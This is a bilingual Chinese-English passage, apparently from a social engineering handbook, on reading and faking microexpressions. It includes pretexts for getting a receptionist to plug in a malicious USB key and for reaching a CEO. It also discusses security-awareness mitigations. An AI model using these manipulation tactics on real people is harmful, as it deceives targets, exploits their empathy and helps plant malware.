Fear can be a big motivator to do many things that you (or your target) would not normally consider doing.

 

惊喜

Surprise

 

如前所述,埃克曼博士和许多其他研究微表情的心理学家一致认为,惊讶与恐惧有着密切的联系,因为它们之间存在某些相似之处。即便如此,它们之间也存在一些明显的差异,比如嘴唇转动的方向和眼睛的反应方式。

As mentioned earlier, Dr. Ekman and many other psychologists in the area of microexpressions have concurred that surprise is closely linked to fear because of certain similarities. Even so, some marked differences exist, such as the direction the lips take and the way the eyes react.

 

尝试这个练习来表现出惊讶:

Try this exercise to show surprise:

 

1.抬起眉毛,不要害怕,而要尽可能睁大眼睛。

2.让你的下巴放松并稍微张开。

3.熟练掌握表达方式后,尝试快速练习。

1. Raise your eyebrows, not in fear but with the goal of widening your eyes as much as you can.

2. Let your jaw unhinge and open slightly.

3. After you get the expression down pat try doing it quickly.

 

我注意到,当我这样做时,我几乎被迫喘息,这让我感到有些惊讶。您应该看到类似于图 5-9 的表情。

I noticed I almost was forced to gasp in some air when I did it, causing me to feel something similar to surprise. You should see an expression similar to Figure 5-9.

 

图 5-9:注意眼睛和嘴唇表现出的与恐惧相似的表情。

Figure 5-9: Notice the way the eyes and lips appear similar to fear.

 
f0509.tif

保罗·埃克曼博士

Dr. Paul Ekman

 
 

惊讶可能是好事也可能是坏事。听到女儿说出第一句话当然是件好事。或者,惊讶可能是你没有预料到的事件、陈述或问题,从而导致这种反应。

Surprise can be good or bad. Hearing your daughter’s first words, of course, is a good surprise. Or the surprise can be one of an event, statement, or question that you didn’t expect that causes this response.

 

如图 5-10所示,那位女士一定看到了令她非常惊讶的东西。也许是有人送了礼物,或者是她的孙子对她说了什么。请注意,她的眉毛上扬,下巴张开。这种惊讶很容易看出,因为它非常明显,表情也很容易辨别。

As you can see in Figure 5-10 whatever that woman must have seen really surprised her. Maybe a gift is being presented or something one of her grandchildren said to her. Notice her eyebrows raised and her jaw is unhinged and open. This kind of surprise is easy to see because it is so pronounced and the expressions are easy to pick out.

 

图 5-10:惊讶常常与恐惧混淆,但两者之间存在一些细微的差别。

Figure 5-10: Often confused with fear, surprise has some minor differences.

 
f0510.tif

© Stylephotographs(罗伯特·克内施克)| Dreamstime.com

© Stylephotographs (Robert Kneschke) | Dreamstime.com

 

如果惊喜是积极的,那么在最初的震惊消退后,它通常会引发微笑或愉快的反应。社会工程师有时可以利用惊喜来打开目标的大门,可以这么说;随后的机智或笑话可以迅速让目标放松下来,导致目标放松警惕。

If the surprise is positive, it can often cause a smile or a jovial response after the initial shock wears off. A social engineer can sometimes use surprise to open the target’s door, so to speak; following up with quick wit or a joke can quickly put the target at ease, causing the target to lower his or her guard.

 

悲伤

Sadness

 

悲伤是一种压倒性的强烈情感。当我们看到其他人表达这种情感时,我们自己也会感到悲伤。有些人只要看到别人悲伤,甚至哭出来,就会感到悲伤。

Sadness is an overwhelming and strong emotion. Sadness is one of those emotions that we may feel ourselves when we see other people who are expressing this emotion. Some people can feel sadness just by seeing others who are sad, even to the point of crying.

 

为了让你了解自己有多容易感到悲伤,请尝试以下练习:

To show you how easily you can feel sadness, try this exercise:

 

1.稍微张开嘴巴。

2.将嘴角向下拉。

3.保持嘴唇不动,同时尝试抬起脸颊,就像眯起眼睛一样。

4.保持紧张状态,向下看并让上眼睑下垂。

1. Drop your mouth open slightly.

2. Pull the corners of your lips down.

3. Hold your lips in place, and while doing that try to raise your cheeks as if you are squinting.

4. While maintaining that tension, look down and let your upper eyelids droop.

 

最有可能的是,你会开始感到悲伤。当我第一次做这个练习时,我感到难以承受。我立刻感到悲伤,并发现我必须控制做这个练习的时间,因为它让我悲伤了好一会儿。要了解这个练习应该是什么样子,请注意图 5-11中的表情。

Most likely you will begin to feel sadness. When I first did this exercise, it was overwhelming for me. I instantly felt sad and found I had to control the length of time I performed it because it caused me to be sad for quite a while. To see how this should look, notice the expression in Figure 5-11.

 

图 5-11:请留意嘴唇和眼睛的向后和向下拉,这表示悲伤。

Figure 5-11: Notice the lips and eyes drawn back and down, signifying sadness.

 
f0511.tif

保罗·埃克曼博士

Dr. Paul Ekman

 
 

悲伤的另一个特点是它并不总是表现为痛苦或极度悲痛,这使它成为一种令人惊奇的情绪。悲伤可以非常微妙。悲伤也可以只表现在脸部的一个部位。人们可能会试图用假笑或我所说的“坚忍的眼睛”来隐藏悲伤,他们直视前方,几乎茫然无措,但你可以看出他们正试图控制自己的情绪。

Another aspect of sadness that makes it an amazing emotion is that it does not always have to display as agony or extreme grief. Sadness can be very subtle. Sadness can also be displayed in just one part of the face. People may try to hide sadness by using a fake smile or what I call “stoic eyes,” where they stare straight ahead, almost in a daze, but you can tell they are trying to control the emotion they are feeling.

 

请看图 5-12。在本例中,您可以看到半张脸被遮住时悲伤的表情。这个女人表现出明显的悲伤迹象,即使她的脸被遮住了,也能看出这一点。请注意,她的眉头微微皱起,眼睑下垂,您可以看到她的嘴角向下。

Take a look at Figure 5-12. In this case you can see an example of sadness when half the face is covered. This woman is showing definite signs of sadness which can be noticed even though her face is covered. Notice her brow is slightly furrowed as well her eyelids dropping and you can see the corners of her mouth pointing downward.

 

图 5-12:注意嘴唇向后向下拉,表示悲伤。

Figure 5-12: Notice the lips drawn back and down, signifying sadness.

 
f0512.tif

Spectrelabs(阿德林·沙姆苏丁)| Dreamstime.com

Spectrelabs (Adrin Shamsudin) | Dreamstime.com

 
 

眼睛是解读悲伤的最佳指标之一。这种表情经常与疲倦和其他会引起类似眼部运动的情绪混淆。将肢体语言与面部表情结合起来也有助于判断是悲伤还是其他情绪。

The eyes are one of the best indicators to reading sadness. The expression is often confused with tiredness and other emotions that can cause similar eye movements. Tying in the body language with what is read on the face can also help to determine if it is sadness or another emotion.

 

如果你在与其他文化打交道,情况可能尤其如此。特别是在脸部大部分被衣服遮住的文化中。在许多中东文化中,女性会遮住大部分脸部,你可能只能看到对方的眼睛。在这些情况下,社会工程师也需要使用肢体语言来判断他们看到的是否是真正的悲伤,这一点非常重要。

This can be especially true if you are dealing with other cultures. Particularly in cultures where much of the face is covered by clothing. In many Middle Eastern cultures where women cover much of their face, you may only be able to see the persons eyes. In these cases it will be very important for the social engineer to also use body language to determine if what they are seeing is genuine sadness.

 

悲伤经常被用于社会工程,因为它可以促使人们采取行动,比如捐款或提供信息。你可能在电视广告中看到过悲伤,广告中有一个非常弱势的孩子。这些孩子可能营养不良、贫困潦倒,似乎没有人爱他们,但只要你捐出一小笔钱,就能让孩子露出笑容。悲伤、哭泣、憔悴的孩子的画面会牵动你的心弦。我并不是说这些广告是恶意的社会工程,只是它们在一定程度上使用了社会工程,利用情感触发来引起目标的反应。

Sadness is often used in social engineering because it can trigger people to take an action such as donate money or give out information. You have probably seen it used in television commercials showing a very disadvantaged child. These children may be malnourished, poverty stricken, and seemingly unloved, but for just a small donation you can bring a smile to the child’s face. The images of sad, crying, emaciated children will tug at your heartstrings. I am not suggesting that these commercials are malicious social engineering, just that they use social engineering to a degree, by using an emotional trigger to get a reaction out of the target.

 

不幸的是,恶意的社会工程师经常利用这种情感触发因素从目标那里获取东西。有一次我走进一家餐馆,无意中听到一个年轻人告诉一群即将离开的老年人,他在高速公路上没油了,需要回家,因为他的妻子已经怀孕九个月了。他失业了,刚刚从高速公路走了一英里,用电话给妻子打电话,想知道他们能不能给他 20 美元。当我听到部分故事时,我放慢了语速,假装自己在打电话,观察剩下的故事。他讲了自己的故事,然后又补充道:“听着,如果你给我你的地址,我会给你寄一张 20 美元的支票”,最后还说:“我向上帝发誓。”

Unfortunately, malicious social engineers often use this emotional trigger to obtain things from their targets. I once walked into a restaurant and overheard a young man telling a group of older folks who were leaving that he just ran out of gas on the highway and needed to get home because his wife was nine months pregnant. He had been out of work and had just walked a mile off the highway to use the phone to call his wife and wondered if they could give him $20. When I heard some of the story I slowed down and made believe I was on a phone call to observe the rest. He told his tale and then backed it up with, “Look if you give me your address, I will mail you a check for the $20,” concluding with “I swear to God.”

 

这个故事中有一些元素可以引起同情,尤其是当他脸上流露出担忧、焦虑和悲伤时。他没有得到 20 美元——那群人中的三个人每人给了他 20 美元。他说了几次“上帝保佑你们”,给了那群人几次拥抱,说他要进去给妻子打电话,告诉她他正在回家的路上。他拥抱了他们,他们离开时感觉好像他们这一周做了一件好事。

The story had some elements in it that could elicit compassion, especially when his face showed concern, anxiety, and sadness. He didn’t get $20—he was given $20 by each of the three people in that group. He said “God bless you” a few times and gave the group a few hugs and said he was going to go in to call his wife and tell her he was on the way home. He hugged them and they left feeling as if they had done their good deed for the week.

 

几分钟后,当我正在吃饭时,我看到他在酒吧里和他的朋友喝着几杯已付了钱的酒。他把悲伤的故事和悲伤的表情混合在一起,成功地操纵了周围人的情绪。

A few minutes later as I’m eating my meal, I see him at the bar drinking a couple of fully paid-for drinks with his buddies. Mixing a sad story with some sad facial expressions, he had been able to manipulate the emotions of those around him.

 

幸福

Happiness

 

幸福可以有很多方面——多到我可能可以专门写一章来描述它,但这不是我的重点。艾克曼博士的书涵盖了许多关于幸福和类似情绪的精彩观点,以及它们如何影响有这种情绪的人及其周围的人。

Happiness can have many facets to it—so many that I can probably make a chapter just on it, but that is not my focus. Dr. Ekman’s books cover many excellent points about happiness and similar emotions and how they affect the person with the emotion and those around him or her.

 

我想重点讲述幸福的几个方面——最重要的是真笑和假笑之间的区别。真笑和假笑是人类表情的一个重要方面,我们应该懂得如何解读,而作为一名社会工程师,我们应该知道如何复制。

What I want to focus on are just a couple aspects of happiness—most importantly the difference between a true smile and a fake smile. The true and the fake smile are an important aspect of human expressions to know how to read, and as a social engineer to know how to reproduce.

 

您是否曾遇到过非常令人愉快的人,但分手后您的配偶或您自己却说“那家伙是个骗子……”?

Has there been a time where you met someone who was very pleasant but after you parted ways your spouse or you yourself said, “That guy was a fake…”?

 

您可能无法在脑海中辨别出真正的微笑,但某种东西告诉您,这个人不是“真实的”。 19 世纪末,法国神经学家杜尚·德·布洛涅 (Duchenne de Boulogne) 对微笑进行了一些有趣的研究。 他能够将电极连接到一名男子的脸上,并触发与微笑相同的面部“肌肉”反应。 尽管这名男子使用了所有正确的肌肉来微笑,但德·布洛涅 (de Boulogne) 确定这名男子的表情仍然是“假笑”。 为什么?

You might not have been able to identify the aspects of a true smile in your head but something told you the person wasn’t being “real.” In the late 1800s a French neurologist, Duchenne de Boulogne, did some fascinating research into smiling. He was able to attach electrodes to a man’s face and trigger the same “muscular” response in the face as a smile. Even though the man was using all the right muscles for smiling, de Boulogne determined that the look of the man was still a “fake smile.” Why?

 

德布洛涅指出,当一个人真诚地微笑时,两块肌肉会被激活,即颧大肌和眼轮匝肌。杜兴发现眼轮匝肌(眼睛周围的肌肉)不能被主动激活,这就是真笑和假笑的区别。

When a person smiles for real, de Boulogne indicates, two muscles are triggered, the zygomaticus major muscle and the orbicularis oculi. Duchenne determined that the orbicularis oculi (muscle around the eyes) cannot be triggered voluntarily and that is what separates a real from a fake smile.

 

埃克曼博士的研究与杜兴氏病的结论一致,尽管最近的研究表明,有些人可以训练自己想象触发该肌肉,但假笑往往只与眼睛有关。真正的微笑是宽阔的,眼睛狭窄,脸颊上扬,下眼睑上拉。据说真正的微笑涉及整个面部,从眼睛到嘴巴,如图5-13所示。

Dr. Ekman’s research concurs with Duchenne’s and although recent research indicates some can train themselves to think about triggering that muscle, more often than not a fake smile is all about the eyes. A real smile is broad with narrow eyes, raised cheeks, and pulled-up lower eyelids. It has been said that a real smile involves the whole face, from the eyes to the mouth, as seen in Figure 5-13.

 

图 5-13: Ekman 博士展示了假笑(左)和真笑(右)。

Figure 5-13: Dr. Ekman demonstrates a fake smile (left) next to a real smile (right).

 
f0513.tif
 

如果你遮住艾克曼博士脸的上半部分,你很难分辨出真笑和假笑。只有当你对比了眼睛,才能看清哪个是假笑,哪个是真笑。

If you were to cover the top half of Dr. Ekman’s face you would be hard pressed to tell a real from a fake smile. It is not until you examine the eyes that it becomes clear, side by side, which smile is fake and which is real.

 

当一个人看到另一个人脸上露出真诚的笑容时,他的内心也会产生同样的情感,并因此而微笑。请看图 5-14,这个男人露出了真诚的笑容,表现出了真正的快乐。请注意他的整个脸部都露出了笑容。

When a person sees a real smile on another person's face, it can trigger that same emotion inside of them and cause them to smile. Notice Figure 5-14, this man is showing genuine happiness with a real smile. Notice how his whole face is involved in this smile.

 

从社会工程学的角度来看,知道如何检测并创造真实的微笑是一项宝贵的信息。社会工程师希望让目标感到轻松,以便对目标产生最大的积极影响。任何形式的社会工程师,无论是销售人员、教师、心理学家还是任何其他社会工程师,通常都会以微笑开始对话。我们的大脑会迅速分析我们对所给予的视觉输入的感受,并会影响其余的互动。

From a social engineering standpoint, knowing how to detect and also create a real smile is a valuable piece of information. A social engineer wants a target to be put at ease, so as to have the greatest positive effect on the target. Social engineers in any form, whether they are salespeople, teachers, psychologists, or any other social engineer, often start off a conversation with a smile. Quickly our brains analyze how we feel about that visual input given to us and it can affect the rest of the interaction.

 

前面的部分包含了很多信息,但你可能想知道社会工程师如何训练自己不仅能看出微表情,而且还能学会如何使用它们。

A lot of information is packed into the preceding section, yet you may be wondering how social engineers can train themselves not only to see microexpressions but also how to use them.

 

图 5-14:请注意他的整个脸部都露出了笑容。

Figure 5-14: Notice how his whole face is involved in this smile.

 
f0514.tif

© Shaileshnanal(Shailesh Nanal)| Dreamstime.com

© Shaileshnanal (Shailesh Nanal) | Dreamstime.com

 
 

训练自己观察微表情

Training Yourself to See Microexpressions

 

好莱坞经常夸大电影和电视中角色的能力。例如,在新热播电视剧《对我撒谎》(基于艾克曼博士的研究)中,主角莱特曼博士似乎毫不费力就能读懂微表情,更令人惊奇的是,他通常能说出这种情绪产生的原因。

Hollywood often overstates the abilities of the characters that appear in movies and television. For example, in the new hit television show Lie To Me (based on Dr. Ekman’s research) the main character, Dr. Lightman, can read microexpressions with seemingly no effort, and what is even more amazing is he usually can tell why the emotion is occurring.

 

然而在现实生活中,像艾克曼博士这样的业内人士所做的大部分研究,意味着坐在预先录制好的会议前,逐帧分析这些会议。经过多年的努力,他可能能够非常快速地注意到、捕捉和分析微表情。20 世纪 70 年代,他做了一个研究项目,发现了一些天生具有注意和正确分析微表情能力的人。

Yet in real life, much of the research done by those in the field, like Dr. Ekman, meant sitting in front of prerecorded sessions and analyzing these sessions frame by frame. After many years of working on this task he is probably able to notice, pick up, and analyze microexpressions very quickly. In the 1970s he did a research project where he identified some who had a natural ability to notice and correctly analyze microexpressions.

 

因为我们中的许多人可能不属于这种天生的能力,所以我们需要一种练习、训练和熟练掌握微表情的方法。我可以告诉你什么对我有用。我阅读了关于如何识别特定微表情的方法,然后练习用镜子重现它,将我的表情与专业人士描述如何做到这一点的笔记进行比较。我通常会有一张显示我正在处理的情绪的图片,因为有东西可以模仿对我有帮助。

Because many of us might not fall into that natural ability category we need a way to practice, train, and become proficient at performing, reading, and using microexpressions. I can tell you what works for me. I read the methods on how a particular microexpression is identified, then practice reproducing it using a mirror, comparing my expression to the notes from the professionals that describe how it is done. I usually have a picture that shows the emotion I am working on because having something to mimic helps me.

 

在我对重现微表情感觉相对良好之后,我会关注它给我带来的感受,调整小区域直到肌肉运动使我感受到匹配的情绪。

After I feel relatively good about reproducing the microexpression I focus on how it makes me feel, tweaking small areas until the muscular movements cause me to feel the matching emotions.

 

然后,我会在互联网上搜索图片,并尝试识别图片中的表情。接下来,我会录制新闻或电视节目,并在关闭声音的情况下慢动作播放某些部分,看看能否确定情绪,然后听听故事,看看我是否接近了。所有这些都会导致与活生生的“对象”一起工作。我观察人们之间的互动,并尝试识别他们在讨论过程中感受到的情绪。我尝试在能够听到对话和无法听到对话的情况下进行。

I then scour the Internet looking for pictures and try to identify the expressions in those pictures. Next, I record news or television shows and play certain parts in slow motion with the sound off to see if can determine the emotion, then listen to the story to see if I was close. All this leads up to working with live “subjects.” I watch people interact with each other and try to identify the emotions they are feeling during their discussions. I try both with being able to hear the conversation and also without being able to.

 

我之所以选择这条路,而不是尝试在自己的对话中解读微表情,是因为我发现在现场环境中尝试这样做更容易,而不必专注于进行良好的对话。我只需阅读面部表情,不会被其他感官输入所困扰。前面的方法是我在有机会见到艾克曼博士并了解他的训练方法之前使用的方法。当然,他的书包含了关于如何重现和解读这些表情的分步说明。他的书中还包括显示情绪的图片以及新闻中显示这些情绪的例子。他的书《情绪揭示》以非常专业的形式做到了这一点,非常适合学习。

The reason I chose this path before trying to read microexpressions in my own conversations is that I found that trying to do it in a live environment without having to also focus on making good conversation is easier. I just read the facial expressions and do not get confused by other sensory input. The preceding method is the one I used before I had a chance to meet Dr. Ekman and be introduced to his training methods. Of course, he has books that contain step-by-step instructions on recreating and reading these expressions. His books also include pictures showing the emotions as well as examples in the news that show those emotions. His book Emotions Revealed does this in a very professional format that is excellent for learning.

 

近年来,艾克曼博士开发并发布了专门针对微表情的培训。他的网站www.paulekman.com提供三种不同类型的培训,改变了人们学习这门强大科学的方式。

In recent years Dr. Ekman has developed and released training specifically for microexpressions. His website, www.paulekman.com, has three different types of training that have changed the way people can learn this powerful science.

 

Ekman 的培训通过视频和文本为用户讲解了每种微表情。用户可以重播表情视频,看看脸部各个部分是如何参与的。在用户花费足够的时间学习和观看视频部分后,她可以进行预测试。预测试使她能够了解自己在注意微表情方面的能力。当用户猜出正在显示的是什么微表情时,她可以得到确认或纠正。如果需要纠正,那么她可以接受额外的教育和培训。

Ekman’s training gives the user a lesson on each type of microexpression via video and text. The user can replay the expression video to see how each part of the face is involved. After the user spends as much time as needed learning and watching the video sections, she can take a pretest. The pretest enables her to see how good she is at noticing microexpressions. When the user guesses at what microexpression is being displayed, she can get confirmation or correction. If correction is needed then she can take additional education and training.

 

当用户对自己的能力充满信心后,她就可以参加真正的考试了。期末考试中不会给出任何批改。用户会看到一次微表情,持续时间只有二十五分之一秒,然后她必须选择微表情是什么,然后等待最后评分。

After the user is confident in her abilities she can take the real test. In the final exam no correction is given. The user is shown a microexpression once for a brief one twenty-fifth of a second, and then she must select what the microexpression is and then wait to be graded at the end.

 

这种训练工具可以让你花数年时间熟练阅读微表情。需要注意的是:Ekman 博士和他的同代人都表示,即使你可能熟练阅读微表情,微表情也是有限的。这是什么意思呢?

This type of training tool can take years off of your learning curve in becoming proficient at reading microexpressions. One caveat: Dr. Ekman, as well as his contemporaries, state that even though you may become proficient in reading microexpressions, a microexpression is limited. What does that mean?

 

演员用来成功表现正确情绪的技巧之一是记住并专注于他们真正感受到需要表现的情绪的时刻;例如,一个产生真实微笑的幸福时刻。如前所述,如果你不是真的感到快乐,那么很难假装出真实的微笑,但如果你能回忆起你感受到那种情绪时的记忆,你的肌肉就会记住并做出反应。

One of the tricks actors use to be able to successfully show proper emotion is to remember and focus on a time when they truly felt the emotion they need to portray; for example, a moment of happiness that produced a real smile. As mentioned earlier, making a real smile is very difficult to fake if you aren’t truly feeling happy, but if you can bring up a memory when you felt that emotion your muscles will remember and react.

 

因此,尽管你可以熟练地解读情绪,但你无法解读情绪背后的原因。原因往往被科学所遗忘。我有一个朋友,她小时候和一个和我的一个好朋友长得很像的人有过一些不好的经历。每当我的朋友出现时,她都会有强烈的情绪反应。如果你读懂她的微表情,你可能会在她的脸上看到恐惧、蔑视,然后是愤怒。她并不恨我的朋友,但她恨她记忆中那个和我的朋友长得很像的人。

Therefore, although you can become proficient at reading the emotion, you cannot read the why behind it. The why is often lost to science. I had a friend who had some bad experiences as a child with a person who closely resembled a good friend of mine. Whenever my friend would come around she had strong emotional reactions. If you were to read her microexpression you would probably see fear, contempt, and then anger on her face. She did not hate my friend, but she hated the person in her memory who resembled my friend.

 

学习如何解读微表情时,这一点值得牢记。表情与情绪相关,但表情不会告诉你为什么会表现出这种情绪。我知道,当我刚开始学习微表情,然后变得有点“熟练”地解读某些表情时,我感觉自己就像是一个读心者。虽然这远非事实,但要注意不要妄下结论。你可能会变得非常擅长解读微表情;然而,后面的部分将讨论如何将这项技能与审讯策略、肢体语言技能和诱导技能相结合,不仅可以弄清楚目标在想什么,还可以引导他们走上你想要的道路。

This is a good point to remember when you are learning how to read microexpressions. The expression is linked to an emotion, but the expression doesn’t tell you why the emotion is being displayed. I know when I first started learning about microexpressions and then became somewhat “proficient” at reading certain expressions, I felt like I was a mind reader. Although this is far from the truth, the caution is to not be assumptive. You may become very good at reading microexpressions; however, later sections discuss how to combine this skill with interrogation tactics, body language skills, and elicitation skills to not only figure out what targets are thinking, but also to lead them down the path you want.

 

你可能仍会有一个疑问:“作为一名社会工程师,我该如何使用这些技能?”

The question you still may have is, “How can I use these skills as a social engineer?”

 

社会工程师如何使用微表情

How Social Engineers Use Microexpressions

 

整个部分都归结为这一点:这项研究很有趣,这种心理背后的科学令人惊叹,你如何在社会工程师审计中利用微表情,恶意的社会工程师又如何使用它们呢?

This whole section leads up to this: As fascinating as the research is, as amazing as the science is behind this psychology, how do you utilize microexpressions in a social engineer audit and how do malicious social engineers use them?

 

本节讨论在社会工程学中使用微表情的两种方法。第一种方法是使用微表情 (ME) 来引发或引起情绪,第二种方法是如何检测欺骗。

This section discusses two methods of how to use microexpressions in social engineering. The first method is using microexpressions (ME) to elicit or cause an emotion, and the second method is how to detect deceit.

 

让我从第一种方法开始,使用你自己的 ME 来引起他人的情绪反应。我最近读了一篇研究论文,它改变了我对 ME 的看法,让我看到了一个新的研究领域。研究人员 Wen Li、Richard E. Zinbarg、Stephan G. Boehm 和 Ken A. Paller 进行了一项名为“无意识感知的情绪面部表情的情感启动的神经和行为证据以及特质焦虑的影响”的研究,改变了现代科学中微表情使用的面貌。

Let me start with the first method, using your own ME to cause an emotional response in others. I recently read a research paper that changed my view of ME and opened my eyes to a new area of research. Researchers Wen Li, Richard E. Zinbarg, Stephan G. Boehm, and Ken A. Paller performed a study called “Neural and Behavioral Evidence for Affective Priming from Unconsciously Perceived Emotional Facial Expressions and the Influence of Trait Anxiety” that changes the face of microexpression usage in modern science.

 

研究人员将数十台微型心电图仪连接到受试者面部的肌肉点。这些设备会记录受试者面部和头部的任何肌肉运动。然后,研究人员为受试者播放视频,视频中每帧有 1/25 秒的微表情闪现。Li 等人发现,几乎在每种情况下,受试者的肌肉运动都会开始反映视频中嵌入的内容。如果是恐惧或悲伤,受试者的面部肌肉就会记录这些情绪。当被问及受试者的情绪时,受试者感受到的情绪就是视频中嵌入的情绪。

The researchers connected dozens of mini-EKGs to muscle points on their subjects’ faces. The devices would register any muscular movements in their face and head. They then played videos for them that had one-twenty-fifth-second flashes of microexpressions in frames. Li et al., found that in almost every case the subject’s muscular movement would begin to mirror that which was embedded in the video. If it was fear or sadness, the subject’s facial muscles would register those emotions. When interviewed about the emotion the subject was feeling it was the emotion embedded in the video.

 

对我来说,这项开创性的研究证明了一个人可以通过表现出微妙的情绪暗示来操纵另一个人进入某种情绪状态。我已经开始从安全角度对此进行研究,我称之为“神经语言黑客”,主要是因为它从微表情和神经语言编程(下一节讨论)中汲取了很多灵感,并将它们结合起来在目标中创造这些情绪状态。

To me, this groundbreaking research proves that a person can manipulate another person to a certain emotional state by displaying subtle hints of that emotion. I have started conducting some research into this from a security angle and I am calling it “neurolinguistic hacking,” mainly because it takes much from microexpressions as well as neurolinguistic programming (discussed in the next section) and combines them to create these emotional states within a target.

 

想象一下这种情况。一名社会工程师想要走进一家公司,目的是让接待员将恶意 USB 密钥插入计算机。他的借口是他要与人力资源经理开会,但在进来的路上,他把咖啡洒在了上一份简历上。他真的需要这份工作,为了帮忙,她会给他打印另一份简历吗?

Imagine this scenario. A social engineer wants to walk into a company with the goal of getting the receptionist to insert a malicious USB key into the computer. His pretext is that he has a meeting with the HR manager, but on the way in, he spilled coffee all over his last resume. He really needs this job and to help, would she print him out another copy of the resume?

 

这是一个可靠的借口,能牵动接待员的心弦,过去我曾用过这个借口。然而,如果社会工程师任由自己的情绪失控,他可能会表现出恐惧的迹象,这与紧张有关。这种恐惧会导致接待员感到不安,并导致请求失败或被拒绝。而如果他控制自己的情绪,并微妙地流露出悲伤的微表情,这与同理心密切相关,那么他的请求很有可能得到满足。

This is a solid pretext that tugs on the receptionist’s heartstrings and has worked for me in the past. Yet, if the social engineer allows his own emotional state to run rampant he might be showing signs of fear, which is linked to nervousness. That fear can translate to an uneasy feeling in the receptionist and failure or rejection of the request. Whereas if he were to control his emotions and flash subtle hints of sad microexpressions, which is closely linked with empathy, then he might have a very good chance at his request being honored.

 

回想一下前面讨论过的那些鼓励人们“每天只捐一美元”来喂养贫困儿童的广告。在请求捐款之前,在显示电话号码和网址之前,在告诉您接受信用卡之前,您的电视屏幕上会闪过许多非常悲伤的儿童的长幅图像。这些贫困儿童和痛苦儿童的图像会让您的大脑处于满足请求所需的情绪状态。

Recall the previous discussion of the commercials that encourage people to donate “only a dollar a day” to feed a child in need. Before requesting money, before flashing a phone number and URL, before telling you that credit cards are accepted, many long images of very sad children flash across your TV screen. Those images of children in need and children in pain put your brain in the emotional state that is needed to comply with the request.

 

这些广告对每个人都有效吗?当然不是。但尽管不是每个人都捐款,但它会影响几乎所有人的情绪状态。这就是社会工程师充分利用 ME 的方式。学会展示这些 ME 的微妙暗示,可以让目标大脑中的神经元反映出他们认为你表现出的情绪状态,让你的目标更愿意遵从你的要求。

Do those commercials work on everyone? No, of course not. But although not everyone donates, it will affect almost everyone’s emotional state. That is how a social engineer can use ME to the fullest. Learning to exhibit the subtle hints of these ME can cause the neurons in your target’s brain to mirror the emotional state they feel you are displaying, making your target more willing to comply with your request.

 

这种对 ME 的使用可能是恶意的,所以我想花点时间谈谈缓解措施(另见第 9 章)。了解 ME 的使用方式并不意味着你需要开始培训公司中的每个人成为 ME 专家。这意味着需要进行良好的安全意识培训。即使请求的目的是让你渴望帮助、渴望拯救、渴望培育,安全政策也必须优先考虑。一个简单的“对不起,我们不能将外国 USB 密钥插入我们的计算机。但两英里外有一家 FedEx Kinko 商店。你可以在那里打印另一份简历。我是否应该告诉史密斯夫人你会迟到几分钟?”

This usage of ME can be malicious, so I want to take a moment to talk about a mitigation (see also Chapter 9). Being aware of how ME can be used doesn’t mean you need to start training everyone in your company to be an ME expert. What it does mean is that good security awareness training does need to occur. Even when requests are designed to make you desire to help, desire to save, desire to nurture, the security policy must take precedence. A simple, “I’m sorry we cannot insert foreign USB keys into our computers. But two miles down the road is a FedEx Kinko’s shop. You can print another resume there. Should I tell Mrs. Smith you will be a few minutes late?”

 

在这种情况下,这样的声明不仅会粉碎社会工程师的计划,还会让目标对象觉得自己是有帮助的。

In this scenario, such a statement would have squashed the social engineer’s plans as well as given the target the feeling of being helpful.

 

要利用 ME 的力量,有时你还必须将其与人类行为的其他方面结合起来。第二种方法,如何检测欺骗,描述了你如何做到这一点。使用 ME 作为社会工程师的第二种方法是检测欺骗。如果你能提出一个问题并知道答案是否属实,那不是很好吗?这个话题一直是许多专业人士激烈争论的焦点,他们声称眼部表情、肢体语言、面部表情或所有上述特征的组合可以表明真相或谎言。虽然有些人不相信这是事实,但其他人认为这些可以作为一门精确的科学。

To utilize the power of ME, sometimes you have to combine it with other aspects of human behavior as well. The second method, how to detect deceit, describes how you can do this. The second method for using ME as a social engineer is in detecting deception. Wouldn’t it be nice if you could ask a question and know whether the response was truth or not? This subject has been a source of heated debate among many professionals who claim that eye patterns, body language, facial expression, or a combination of all the preceding can indicate truth or deception. While some do not believe this to be the case, others feel these can be used as an exact science.

 

尽管每个想法中可能都存在一些道理,但你如何利用微表情来检测欺骗行为呢?

Although some truth may exist in each of those thoughts, how can you use microexpressions to detect deception?

 

要回答这个问题,你必须考虑的不仅仅是微表情,因为正如本节所述,微表情是基于情绪和对情绪的反应。阅读本节时请记住这一点,本节分析了一些原因和影响。

To answer this question you must take into account more than just microexpressions because, as identified throughout this section, microexpressions are based on emotions and reactions to emotions. Keep this in mind while reading this section, which analyzes some causes and effects.

 

有四件事可以帮助你发现目标的欺骗行为:

Four things can help you detect deceit in a target:

 
 
     
  • 矛盾
  • Contradictions
  •  
     
  • 犹豫
  • Hesitation
  •  
     
  • 行为变化
  • Changes in behavior
  •  
     
  • 手势
  • Hand gestures
  •  
 

以下部分将更详细地讨论这些项目。

The following sections discuss these items in more detail.

 

矛盾

Contradictions

 

矛盾尤其棘手,因为它们经常会出现在事实叙述中。我知道,就我而言,我经常忘记细节,而我的妻子会很快告诉我。在我得到一些提示后,我常常能记住整个故事。这并不意味着我总是在故事或对话的开头撒谎,但我并不总是能清楚地记得所有细节,以至于一开始就对它们发表评论,或者我认为我记得细节,但实际上我记不清了。即使在我“记住”细节之后,这些细节也可能是我所理解的现实,而不是故事实际发生的方式。

Contradictions are particularly tricky because they often can and do occur in factual accounts. I know in my case I often forget details, and my wife will fill them in quickly. After I get a little hint here or there I often can remember the full story. This doesn’t mean that I am always lying at the beginning of a story or conversation, but I don’t always remember all the details clearly enough to comment on them at first, or I think I do remember the details but I really don’t. Even after I “remember” the details, the details may be my version of reality and not the way the story actually happened.

 

在评估矛盾是否是说谎的线索时,这种无意的不诚实是值得考虑的。矛盾应该促使你进一步挖掘。当你询问对方矛盾时,观察对方的微表情也很有帮助。

This inadvertent dishonesty is important to consider when evaluating contradictions as a clue to lying. What a contradiction should do is prompt you to dig more. Watching the person’s microexpressions while you question him about a contradiction is also helpful.

 

例如,假设你找了一个借口,说自己是一名上门推销员。你打算亲自拜访 CEO,向他送上一张带有特别优惠的 CD。你知道 CEO 非常支持某个慈善机构,所以你以此为借口。当你走进大厅时,前台人员说:“对不起,他不在,你可以把它留给我。”

For example, suppose you have developed a pretext as a visiting salesperson. You are going to try to gain physical access to the CEO to deliver a CD with a special offer. You know the CEO is very partial to a certain charity so you developed the pretext around that. As you walk into the lobby the front desk person says, “Sorry, he is not in, you can just leave it with me.”

 

